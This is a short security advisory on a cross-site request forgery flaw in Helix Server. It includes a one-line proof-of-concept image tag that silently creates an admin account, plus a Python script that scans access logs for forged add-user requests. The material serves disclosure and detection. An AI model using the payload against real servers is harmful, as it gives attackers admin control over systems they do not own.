Helix Server Cross-site Request Forgery

Description

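A cross-site request forgery vulnerability in Helix Server can be exploited to create a new admin account. As the proof of concept shows, the add-user request is a GET with all of its parameters in the URL, so an image tag on any page that an authenticated administrator visits is enough to trigger it.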

Proof Of Concept

<html>
    <body>
        <img src="http://testbox:15257/admin/auth.adduser.html?respage=config_results.nc.html&name=new_admin&pass=Password1&realm=TESTBOX.AdminRealm" />
    </body>
</html>
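
For detection, the forged request stands out in access logs because it reaches the add-user endpoint without coming from the admin pages. The following is an added example, not part of the original advisory; the combined log format, the `ADMIN_HOSTS` value and the sample log lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the server or a fronting proxy writes combined-format access logs.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"'
)
ADDUSER_PATH = "/admin/auth.adduser.html"  # endpoint from the proof of concept
ADMIN_HOSTS = {"testbox:15257"}            # assumption: origin of the real admin UI

def find_forged_adduser(lines, admin_hosts=ADMIN_HOSTS):
    """Return add-user requests that did not originate from the admin UI."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path.lower() != ADDUSER_PATH:
            continue
        referer = m["referer"]
        # A missing Referer is also reported: it can be suppressed by the embedding page.
        ref_host = urlsplit(referer).netloc.lower() if referer not in ("", "-") else ""
        if ref_host in admin_hosts:
            continue  # submitted from the admin pages themselves
        params = parse_qs(url.query)
        findings.append({
            "client": m["client"],
            "status": int(m["status"]),
            "referer": referer,
            "new_user": params.get("name", [""])[0],
            "realm": params.get("realm", [""])[0],
        })
    return findings

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '10.0.0.5 - admin [12/Mar/2018:10:01:22 +0000] "GET /admin/auth.adduser.html?respage=config_results.nc.html&name=operator2&pass=REDACTED&realm=TESTBOX.AdminRealm HTTP/1.1" 200 512 "http://testbox:15257/admin/" "Mozilla/5.0"',
    '10.0.0.5 - admin [12/Mar/2018:10:07:40 +0000] "GET /admin/auth.adduser.html?respage=config_results.nc.html&name=new_admin&pass=REDACTED&realm=TESTBOX.AdminRealm HTTP/1.1" 200 512 "http://forum.example/thread/42" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2018:10:08:03 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '10.0.0.5 - admin [12/Mar/2018:10:09:15 +0000] "GET /admin/auth.adduser.html?respage=config_results.nc.html&name=svc&pass=REDACTED&realm=TESTBOX.AdminRealm HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_forged_adduser(SAMPLE_LOG):
        print(finding)
```

Each finding names an account to review in the admin realm. Because the password travels in the query string, it is also recorded in these logs and should be treated as exposed.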


Copyright © 2018 AutoSec Tools LLC